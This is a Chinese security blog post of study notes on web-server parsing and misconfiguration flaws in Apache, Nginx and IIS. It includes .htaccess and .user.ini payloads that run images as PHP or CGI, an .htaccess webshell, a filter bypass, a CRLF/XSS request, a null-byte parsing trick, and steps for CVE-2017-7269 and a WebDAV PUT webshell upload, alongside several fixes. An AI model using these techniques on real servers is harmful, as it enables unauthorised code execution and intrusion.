

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.png">
  <link rel="icon" type="image/png" href="/img/avatar.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="alanlitl">
  <meta name="keywords" content="">
  <title>中间件漏洞 - alanlitl-blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"alanlitl.github.io","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>alanlitl</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="中间件漏洞">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-12-08 19:06" pubdate>
        2020年12月8日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.6k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      34
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">中间件漏洞</h1>
            
            <div class="markdown-body">
              <h1 id="apache"><a href="#apache" class="headerlink" title="apache"></a>apache</h1><p>php常见运行方式有 apache的模块模式(分为mod_php和mod_cgi) cgi<code>模式, </code>fast-cgi模式</p>
<ol>
<li><p>cgi模式就是建立在多进程上的, 但是cgi的每一次请求都会有启动和退出的过程(fork-and-execute模式, 启动脚本解析器解析php.ini 初始化运行环境, 载入dll), 这在高并发时性能非常弱.</p>
</li>
<li><p>fast-cgi就是为了解决cgi的问题而诞生的, web server 启动时 会启动fastcgi进程管理器, fastcgi进程管理器读取php.ini文件并初始化, 然后启动多个cgi解释器进程(php-cgi), 当收到请求时,web server会将相关数据发送到fastcgi的子进程 php-cgi中处理.</p>
</li>
<li><p>apache模块模式</p>
<ul>
<li><p>mod_php模式, apache调用与php相关模块(apache内置), 将php当做apache子模块运行. apache每收到一个请求就会启动一个进程并通过sapi(php和外部通信的接口)来连接php</p>
</li>
<li><p>mod_cgi/mod_fcgid模式 使用cgi或者fast-cgi实现.</p>
</li>
</ul>
</li>
</ol>
<blockquote>
<p> 而php版本分为nts(None-Thread Safe) 和 ts(Thread Safe), 在windows中创建线程更为快捷,而在linux中创建进程更快捷,在nts版本下 fast-cgi拥有更好的性能所以windows下经常采用fast-cgi方式解析php. 所以在nts版本里面是没有mod_php (phpxapachexxx.dll)模块的.</p>
</blockquote>
<pre><code class="hljs applescript">AddHandler:
	AddHandler php5-<span class="hljs-keyword">script</span> .jpg
	AddHandler   fcgid-<span class="hljs-keyword">script</span> .jpg
	在文件扩展名与特定处理器之间建立映射
Addtype:
	AddType <span class="hljs-built_in">application</span>/x-httpd-php .jpg</code></pre>



<h2 id="1-多名后缀"><a href="#1-多名后缀" class="headerlink" title="1.  多名后缀"></a>1.  多名后缀</h2><p>如：</p>
<pre><code class="hljs css"><span class="hljs-selector-tag">flag</span><span class="hljs-selector-class">.php</span><span class="hljs-selector-class">.aaa</span>  就会解析为<span class="hljs-selector-tag">php</span>文件</code></pre>

<p>其中php文件后缀</p>
<pre><code class="hljs smali"><span class="hljs-string">&quot;.+\.ph(p[345]?|t|tml)\.&quot;</span>
php,php3,php4,php5,pht,phtml都会当成php文件执行</code></pre>

<h2 id="2-htaccess"><a href="#2-htaccess" class="headerlink" title="2.htaccess"></a>2<code>.htaccess</code></h2><blockquote>
<p> 修改<code>.htaccess</code>的文件名<code>修改apache下的conf文件的AccessFileName .htaccess</code></p>
</blockquote>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201125000601.png" srcset="/img/loading.gif" alt="屏幕截图 2020-11-24 220154"></p>
<p>作用</p>
<blockquote>
<p>.htaccess文件可以配置很多事情，如<strong>是否开启站点的图片缓存</strong>、<strong>自定义错误页面</strong>、<strong>自定义默认文档</strong>、<strong>设置WWW域名重定向</strong>、<strong>设置网页重定向</strong>、<strong>设置图片防盗链和访问权限控制</strong>。但我们这里只关心.htaccess文件的一个作用——MIME类型修改。</p>
</blockquote>
<h3 id="生效条件-php解析-命令执行"><a href="#生效条件-php解析-命令执行" class="headerlink" title="生效条件(php解析, 命令执行)"></a>生效条件(php解析, 命令执行)</h3><p>在<code>CGI/FastCGI</code>模式下 (在phpinfo中的Server API查看)</p>
<p><code>.htaccess</code>文件配置</p>
<ol>
<li>将jpg后缀文件解析为php文件</li>
</ol>
<pre><code class="hljs mipsasm"><span class="hljs-keyword">AddHandler </span>  fcgid-<span class="hljs-keyword">script </span>.<span class="hljs-keyword">jpg</span>
<span class="hljs-keyword">FcgidWrapper </span><span class="hljs-string">&quot;G:/11111111gongju/phpstudy_pro/Extensions/php/php7.0.9nts/php-cgi.exe&quot;</span> .<span class="hljs-keyword">jpg</span>
<span class="hljs-keyword">将php-cgi.exe路径改为对应的php版本即可</span></code></pre>

<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201125004422.png" srcset="/img/loading.gif" alt="屏幕截图 2020-11-24 220129"></p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201125004325.png" srcset="/img/loading.gif" alt="屏幕截图 2020-11-25 004230"></p>
<ol start="2">
<li><p>执行命令(此方法下我无法解析php了)</p>
<p>AddHandler添加某一特殊文件后缀作为cgi程序</p>
<pre><code class="hljs subunit">.htaccess

Options +ExecCGI
AddHandler cgi-script .jpg

test.jpg
#!C:/Windows/System32/cmd.exe /c start notepad
test

必须要有两排数据 第二排随意

方法二:
打开任意文件执行命令
Options +ExecCGI(如果配置文件中有则不用添加)
AddHandler   fcgid-script .jpg
FcgidWrapper &quot;C:/Windows/System32/cmd.exe /c start calc.exe&quot; .jpg</code></pre>

<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201125221102.png" srcset="/img/loading.gif" alt="屏幕截图 2020-11-25 221034"></p>
</li>
</ol>
<blockquote>
<p>这与apache的conf/vhosts文件夹中的配置相同, 这个文件夹可以在单个ip创建不同域名的配置文件.</p>
</blockquote>
<ol start="3">
<li>使用<code>SetHandler</code>将目录下所有文件视为cgi程序</li>
</ol>
<pre><code class="hljs applescript">SetHandler cgi-<span class="hljs-keyword">script</span>
或者
SetHandler   fcgid-<span class="hljs-keyword">script</span>
FcgidWrapper <span class="hljs-string">&quot;C:/Windows/System32/cmd.exe /c start calc.exe</span>
<span class="hljs-string"></span>
<span class="hljs-string">不需要添加后缀</span></code></pre>

<ol start="4">
<li><p>使用相对路径</p>
<blockquote>
<p>无法使用绝对路径是可以利用一下</p>
</blockquote>
</li>
</ol>
<p>在handler模式下</p>
<pre><code class="hljs awk"><span class="hljs-number">1</span>. 配置文件中在对应目录下 如: <span class="hljs-regexp">/var/</span>www/html添加  AllowOverride All

windows下Apache要加载mod_Rewrite模块，配置文件上写上：LoadModule rewrite_module <span class="hljs-regexp">/usr/</span>lib<span class="hljs-regexp">/apache2/m</span>odules/mod_rewrite.so

重启apache</code></pre>



<pre><code class="hljs applescript"><span class="hljs-number">1.</span> AddType <span class="hljs-built_in">application</span>/x-httpd-php .xxx 
   AddHandler <span class="hljs-built_in">application</span>/x-httpd-php .xxx    将xxx后缀作为php解析

<span class="hljs-number">2.</span> SetHandler <span class="hljs-built_in">application</span>/x-httpd-php 将该目录下所有文件及其子文件中的文件当做php解析
<span class="hljs-number">3.</span>  
  &lt;FilesMatch <span class="hljs-string">&quot;.+\.jpg&quot;</span>&gt;
    SetHandler <span class="hljs-built_in">application</span>/x-httpd-php
  &lt;/FilesMatch&gt;
该语句会让Apache把.jpg文件解析为php文件。</code></pre>

<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201129144102.png" srcset="/img/loading.gif" alt="屏幕截图 2020-11-29 143947"></p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201129144108.png" srcset="/img/loading.gif" alt="屏幕截图 2020-11-29 143957"></p>
<ul>
<li><p>防御方法</p>
<p>修改匹配规则</p>
<pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">FileMatch</span> &quot;<span class="hljs-attr">.</span>+\<span class="hljs-attr">.php</span>$&quot;&gt;</span>
SetHandler application/x-httpd-php
<span class="hljs-tag">&lt;/<span class="hljs-name">FileMatch</span>&gt;</span></code></pre>

<p>禁止.php.这样的文件执行</p>
<pre><code class="hljs php">&lt;FileMatch <span class="hljs-string">&quot;.+\.ph(p[3457]?|t|tml)\.&quot;</span>&gt;
<span class="hljs-keyword">Require</span> all denied
&lt;/FileMatch&gt;</code></pre>

</li>
</ul>
<p><code>.htaccess包含文件</code></p>
<pre><code class="hljs php">php_value auto_prepend_file <span class="hljs-string">&quot;test.jpg&quot;</span> 文件开始插入
php_value auto_append_file <span class="hljs-string">&quot;test.jpg&quot;</span>  文件结束插入

利用伪协议 
php_value auto_prepend_file php:<span class="hljs-comment">//filter/convert.base64-decode/resource=test.jpg</span>

test.jpg  
<span class="hljs-meta">&lt;?php</span> phpinfo();<span class="hljs-meta">?&gt;</span></code></pre>

<h3 id="其他利用方式"><a href="#其他利用方式" class="headerlink" title="其他利用方式"></a>其他利用方式</h3><p>查看apache服务器信息</p>
<pre><code class="hljs apache"><span class="hljs-attribute"><span class="hljs-nomarkup">SetHandler</span></span> server-status</code></pre>

<p>绕过preg_math</p>
<pre><code class="hljs css">设置回溯限制
 <span class="hljs-selector-tag">pcre</span><span class="hljs-selector-class">.backtrack_limit</span>给<span class="hljs-selector-tag">pcre</span>设定了一个回溯次数上限，默认为1000000，如果回溯次数超过这个数字，<span class="hljs-selector-tag">preg_match</span>会返回<span class="hljs-selector-tag">false</span>,在,<span class="hljs-selector-tag">htaccess</span>中手动修改这个限制
 
<span class="hljs-selector-tag">php_value</span> <span class="hljs-selector-tag">pcre</span><span class="hljs-selector-class">.backtrack_limit</span> 0
<span class="hljs-selector-tag">php_value</span> <span class="hljs-selector-tag">pcre</span><span class="hljs-selector-class">.jit</span> 0</code></pre>

<p>使<code>.htaccess</code>可以访问</p>
<pre><code class="hljs gams">编辑.htaccess
&lt;<span class="hljs-keyword">Files</span> ~ <span class="hljs-string">&quot;.htaccess&quot;</span>&gt;
    Require <span class="hljs-keyword">all</span> granted
    Order allow,deny
    Allow from <span class="hljs-keyword">all</span>
&lt;/<span class="hljs-keyword">Files</span>&gt;</code></pre>

<p>将<code>.htaccess</code>作为shell</p>
<pre><code class="hljs php-template"><span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">Files</span> ~ &quot;<span class="hljs-attr">.htaccess</span>&quot;&gt;</span></span>
<span class="xml">    Require all granted</span>
<span class="xml">    Order allow,deny</span>
<span class="xml">    Allow from all</span>
<span class="xml"><span class="hljs-tag">&lt;/<span class="hljs-name">Files</span>&gt;</span></span>

<span class="xml">SetHandler application/x-httpd-php</span>

<span class="xml">#</span><span class="php"><span class="hljs-meta">&lt;?php</span> phpinfo();<span class="hljs-meta">?&gt;</span></span>
<span class="xml">注意#号</span></code></pre>

<h3 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h3><pre><code class="hljs livescript">反斜线绕过
SetHa<span class="hljs-string">\</span>
ndler appli<span class="hljs-string">\</span>
cation/x-ht<span class="hljs-string">\</span>
tpd-php

文件中不能包含某些关键字符
上传base加密的文件
利用php_value auto_prepend_file包含文件时base解密

包含session文件

php_value auto_append_file <span class="hljs-string">&quot;/tmp/sess_session文件名&quot;</span>
php_value session.save_path <span class="hljs-string">&quot;/tmp&quot;</span>  <span class="hljs-comment"># session文件储存位置</span>
php_flag session.upload_progress.cleanup <span class="hljs-literal">off</span> <span class="hljs-comment"># session上传进度</span></code></pre>

<h2 id="3-use-ini"><a href="#3-use-ini" class="headerlink" title="3. .use.ini"></a>3. <code>.use.ini</code></h2><blockquote>
<p><code>.usr.ini</code>不只是nginx专有的, 只要是以 fastcgi 方式运行php的 都能够使用(apache/nginx/iis), 作用相当于可以自定义的<code>php.ini</code>文件</p>
</blockquote>
<pre><code class="hljs ini"><span class="hljs-attr">auto_prepend_file</span>=<span class="hljs-number">123</span>.jpg 文件前包含
<span class="hljs-attr">auto_append_file</span> = <span class="hljs-number">123</span>.jpg文件后包含</code></pre>

<p>让目录下的所有php文件自动包含<code>123.jpg</code>文件</p>
<h2 id="4-目录遍历"><a href="#4-目录遍历" class="headerlink" title="4. 目录遍历"></a>4. 目录遍历</h2><p><code>httpd.conf</code>下</p>
<pre><code class="hljs coq"><span class="hljs-keyword">Options</span>+Indexes+FollowSymLinks +ExecCGI   改为   <span class="hljs-keyword">Options</span>-Indexes+FollowSymLinks +ExecCGI</code></pre>

<h1 id="nginx"><a href="#nginx" class="headerlink" title="nginx"></a>nginx</h1><h2 id="文件名解析漏洞"><a href="#文件名解析漏洞" class="headerlink" title="文件名解析漏洞"></a>文件名解析漏洞</h2><blockquote>
<p>影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7</p>
</blockquote>
<pre><code class="hljs nginx"><span class="hljs-attribute">location</span> <span class="hljs-regexp">~ \.php$</span> &#123;
    <span class="hljs-attribute">include</span>        fastcgi_params;

    <span class="hljs-attribute">fastcgi_pass</span>   <span class="hljs-number">127.0.0.1:9000</span>;
    <span class="hljs-attribute">fastcgi_index</span>  index.php;
    <span class="hljs-attribute">fastcgi_param</span>  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;
    <span class="hljs-attribute">fastcgi_param</span>  DOCUMENT_ROOT /var/www/html;
&#125;</code></pre>

<blockquote>
<p>当nginx匹配到<code>.php</code>结尾的文件时就将其当做php文件解析</p>
<p>当我们请求<code>test.jpg[0x20][0x00].php</code>时, 就会将其匹配为php文件, 但是nginx却认为这是jpg文件, 将其设置为SCRIPT_FILENAME的值发送给fastcgi, fastcgi根据<code>SCRIPT_FILENAME</code>的值进行解析造成漏洞</p>
</blockquote>
<p>我们只需上传一个空格结尾的文件(如<code>1.jpg空格</code>), 访问1.jpg空格[0x00].php就行</p>
<pre><code class="hljs css">可以先发写为1<span class="hljs-selector-class">.jpgaa</span><span class="hljs-selector-class">.php</span>, 然后再<span class="hljs-selector-tag">hex</span>格式中修改为20 00</code></pre>

<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201202220517.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-02 220506"></p>
<h2 id="文件后缀解析"><a href="#文件后缀解析" class="headerlink" title="文件后缀解析"></a>文件后缀解析</h2><p>源文件为<code>test.jpg</code>访问时改为<code>test.jpg/x.php</code>解析为php(x随意)</p>
<pre><code class="hljs reasonml"><span class="hljs-number">1.</span> 在高版本的php中关闭security.limit<span class="hljs-constructor">_extensions(在<span class="hljs-params">php</span>-<span class="hljs-params">fpm</span>.<span class="hljs-params">conf</span>直接删除)</span>
	一般为security.limit_extensions php只允许.php文件执行, 添加 .jpg 将jpg文件作为php文件执行, 需要重启php-fpm
<span class="hljs-number">2.</span> php.ini中设置cgi.fix_pathinfo=<span class="hljs-number">1</span>
	当访问/test.jpg/x.php时 若x.php不存在则向前解析</code></pre>

<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201201204411.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-01 204236"></p>
<pre><code class="hljs awk">修复
php.ini 中的  cgi.fix_pathinfo=<span class="hljs-number">0</span> 访问后就是<span class="hljs-number">404</span>
将<span class="hljs-regexp">/etc/</span>php5<span class="hljs-regexp">/fpm/</span>pool.d/www.conf 添加 security.limit_extensions = .php</code></pre>



<h2 id="CRLF"><a href="#CRLF" class="headerlink" title="CRLF"></a>CRLF</h2><p>http的报文就是<code>CRLF</code>分隔的(回车+换行)</p>
<p>若nginx在解析url时将其解码则会造成注入</p>
<pre><code class="hljs awk">错误的配置文件
location / &#123;
	return <span class="hljs-number">302</span> https:<span class="hljs-regexp">//</span><span class="hljs-variable">$host</span><span class="hljs-variable">$uri</span>;
&#125;</code></pre>

<p>详细可参考: <a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/bottle-crlf-cve-2016-9964.html">Bottle HTTP 头注入漏洞探究 | 离别歌 (leavesongs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html">新浪某站CRLF Injection导致的安全问题 | 离别歌 (leavesongs.com)</a></p>
<pre><code class="hljs llvm">在请求时加上
/<span class="hljs-variable">%0</span>d<span class="hljs-variable">%0</span>a<span class="hljs-variable">%0</span>d<span class="hljs-variable">%0</span>a&lt;img src<span class="hljs-operator">=</span><span class="hljs-number">1</span> onerror<span class="hljs-operator">=</span>alert(/xss/)&gt;(<span class="hljs-variable">%0</span>d<span class="hljs-variable">%0</span>a<span class="hljs-operator">=</span><span class="hljs-operator">=</span>&gt;回车+换行)</code></pre>

<h2 id="目录穿越"><a href="#目录穿越" class="headerlink" title="目录穿越"></a>目录穿越</h2><p><code>alias</code>为目录配置别名时, 如果没有没有添加<code>/</code></p>
<p><code>nginx.conf</code>修改为</p>
<pre><code class="hljs nginx"><span class="hljs-attribute">location</span> /files &#123;  <span class="hljs-comment">#这里files就没有闭合</span>
	<span class="hljs-attribute">autoindex</span> <span class="hljs-literal">on</span>;
	<span class="hljs-attribute">alias</span> /home/;</code></pre>

<p>访问<code>files../</code>即可造成目录穿越</p>
<pre><code class="hljs arcade">修复: 将/files闭合  ==&gt;  <span class="hljs-regexp">/files/</span></code></pre>

<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201202211725.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-02 211635"></p>
<h2 id="add-header覆盖"><a href="#add-header覆盖" class="headerlink" title="add_header覆盖"></a>add_header覆盖</h2><p>错误配置文件</p>
<p>Nginx配置文件子块（server、location、if）中的<code>add_header</code>，将会覆盖父块中的<code>add_header</code>添加的HTTP头</p>
<pre><code class="hljs nginx"><span class="hljs-attribute">add_header</span> Content-Security-Policy <span class="hljs-string">&quot;default-src &#x27;self&#x27;&quot;</span>;
<span class="hljs-attribute">add_header</span> X-Frame-Options DENY;

<span class="hljs-attribute">location</span> = /test1 &#123;
    <span class="hljs-attribute">rewrite</span><span class="hljs-regexp"> ^(.*)$</span> /xss.html <span class="hljs-literal">break</span>;
&#125;

<span class="hljs-attribute">location</span> = /test2 &#123;
    <span class="hljs-attribute">add_header</span> X-Content-Type-Options nosniff;  <span class="hljs-comment">#覆盖掉父块中的配置</span>
    <span class="hljs-attribute">rewrite</span><span class="hljs-regexp"> ^(.*)$</span> /xss.html <span class="hljs-literal">break</span>;
&#125;</code></pre>

<h1 id="IIS"><a href="#IIS" class="headerlink" title="IIS"></a>IIS</h1><h2 id="cve-2017-7269"><a href="#cve-2017-7269" class="headerlink" title="cve-2017-7269"></a>cve-2017-7269</h2><blockquote>
<p>iis 6.0 开启webdav, 攻击前记得拍摄快照!!!!!</p>
</blockquote>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205002807.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-05 002759"></p>
<blockquote>
<p> exp: <a target="_blank" rel="noopener" href="https://github.com/zcgonvh/cve-2017-7269">zcgonvh/cve-2017-7269: fixed msf module for cve-2017-7269 (github.com)</a></p>
</blockquote>
<p>直接set rhost然后exploit</p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205002912.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-05 002610"></p>
<p> 直接打是用在iis没有绑定主机时</p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205003708.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-05 003701"></p>
<p>如果绑定了就需要输入物理路径长度 (如: <code>c:\inetpub\wwwroot\</code> 就是19)</p>
<p>修改路径为<code>c:\inetpub\wwwroot1111111</code></p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205160544.png" srcset="/img/loading.gif" alt="QQ截图20201205160536"></p>
<p>使用脚本爆破(<a target="_blank" rel="noopener" href="https://github.com/admintony/Windows-Exploit/tree/master/IIS6_WebDAV_Scanner">Windows-Exploit/IIS6_WebDAV_Scanner at master · admintony/Windows-Exploit (github.com)</a></p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205160655.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-05 160647"></p>
<pre><code class="hljs gams"><span class="hljs-keyword">set</span> PhysicalPathLength <span class="hljs-comment">26</span></code></pre>

<p>然后即可攻击成功</p>
<h2 id="PUT漏洞"><a href="#PUT漏洞" class="headerlink" title="PUT漏洞"></a>PUT漏洞</h2><blockquote>
<p> 条件 IIS6.0  开启WebDAV和<strong>来宾用户写权限</strong></p>
</blockquote>
<p>使用PUT方式, 上传txt文件(直接上传asp文件会失败)</p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205173732.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-05 173550"></p>
<p>然后利用move将txt文件修改为asp, 变为可执行脚本  蚁剑连接</p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205181520.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-05 181456"></p>
<p>记得在web扩展中开启active server pages</p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205181308.png" srcset="/img/loading.gif" alt="QQ截图20201205181300"></p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205181531.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-05 181142"></p>
<h2 id="短文件名猜测"><a href="#短文件名猜测" class="headerlink" title="短文件名猜测"></a>短文件名猜测</h2><blockquote>
<p>windows下为兼容MS-DOS而生成的短文件</p>
<p>只显示前6个字符, 后面的字符使用<del>1,</del>2等等代替, 后缀只显示前3个字符. 并且全部以大写字母显示</p>
<p>文件名大于9或者后缀大于4才会生成短文件名, 使用<code>dir /x</code>查看短文件名</p>
</blockquote>
<p>影响版本</p>
<blockquote>
<p>IIS 1.0，Windows NT 3.51  </p>
<p>IIS 3.0，Windows NT 4.0 Service Pack 2  </p>
<p>IIS 4.0，Windows NT 4.0选项包</p>
<p>IIS 5.0，Windows 2000  </p>
<p>IIS 5.1，Windows XP Professional和Windows XP Media Center Edition  </p>
<p>IIS 6.0，Windows Server 2003和Windows XP Professional x64 Edition  </p>
<p>IIS 7.0，Windows Server 2008和Windows Vista  </p>
<p>IIS 7.5，Windows 7（远程启用<customErrors>或没有web.config）</p>
<p>IIS 7.5，Windows 2008（经典管道模式）</p>
<p>IIS使用.Net Framework 4时不受影响</p>
</blockquote>
<p>漏洞成因</p>
<pre><code class="hljs awk">使用短文件名访问存在的文件时会返回<span class="hljs-number">404</span>, 否则返回<span class="hljs-number">400</span>
如存在aaaaaaaaaa.txt 短文件名为 AAAAAA~<span class="hljs-number">1</span>.TXT的文件
访问http:<span class="hljs-regexp">//</span>xxxxx<span class="hljs-regexp">/A*~1.*/</span>.aspx会返回<span class="hljs-number">404</span>
通过逐步增加字符找出文件的文件名</code></pre>

<p>缺点:</p>
<pre><code class="hljs stata">只能找出前6个字符和后缀的三个字符
只能猜解有短文件名的文件
不支持中文
<span class="hljs-keyword">iis</span>和.<span class="hljs-keyword">net</span>都需要满足</code></pre>

<p>漏洞修复</p>
<pre><code class="hljs taggerscript">升级.net到4.0及以上版本
修改注册表, HKEY<span class="hljs-symbol">\ </span>LOCAL MACHINE<span class="hljs-symbol">\\</span>SYSTEM<span class="hljs-symbol">\\</span>CurrentControlSet<span class="hljs-symbol">\\</span>Control<span class="hljs-symbol">\\</span>FileSystem中的 NtfsDisable8dot3 Name Creation值为1,使其不创建短文件名</code></pre>



<h2 id="后缀解析漏洞"><a href="#后缀解析漏洞" class="headerlink" title="后缀解析漏洞"></a>后缀解析漏洞</h2><pre><code class="hljs axapta">cer asa cdx 都会当做asp文件解析
但是我在windows <span class="hljs-keyword">server</span> <span class="hljs-number">2003</span> + iis <span class="hljs-number">6.0</span>下只有cer可以</code></pre>

<p>漏洞原因:</p>
<p>​    当访问不存在文件时返回404, 访问不存在短文件名时返回400</p>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205195549.png" srcset="/img/loading.gif" alt="屏幕截图 2020-12-05 195037"></p>
<blockquote>
<p>版本: iis 6.0</p>
</blockquote>
<ol>
<li>xxx.asp文件夹里面的文件都会以asp解析</li>
</ol>
<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205193319.png" srcset="/img/loading.gif" alt="QQ截图20201205193209"></p>
<ol start="2">
<li><p><code>;</code>截断</p>
<pre><code class="hljs css"><span class="hljs-selector-tag">xxx</span><span class="hljs-selector-class">.asp</span>;<span class="hljs-selector-class">.txt</span>会以<span class="hljs-selector-tag">asp</span>文件执行</code></pre>

<p><img src="https://alanlitl.oss-cn-chengdu.aliyuncs.com/picgo/20201205193556.png" srcset="/img/loading.gif" alt="QQ截图20201205193547"></p>
</li>
</ol>
<ol start="3">
<li>遇到php文件时</li>
</ol>
<blockquote>
<p>iis 7.5</p>
</blockquote>
<pre><code class="hljs css">当<span class="hljs-selector-tag">iis</span>遇见<span class="hljs-selector-tag">php</span>后缀文件时, 将其交给<span class="hljs-selector-tag">php</span>处理, 当<span class="hljs-selector-tag">php</span>开启<span class="hljs-selector-tag">cgi</span><span class="hljs-selector-class">.fix_pathinfo</span>时会处理文件, 如同<span class="hljs-selector-tag">nginx</span>一样
